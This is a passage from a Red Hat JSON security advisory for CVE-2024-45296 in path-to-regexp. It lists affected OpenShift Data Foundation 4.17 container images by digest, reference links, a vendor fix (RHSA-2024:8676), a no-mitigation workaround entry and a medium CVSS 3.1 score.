"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
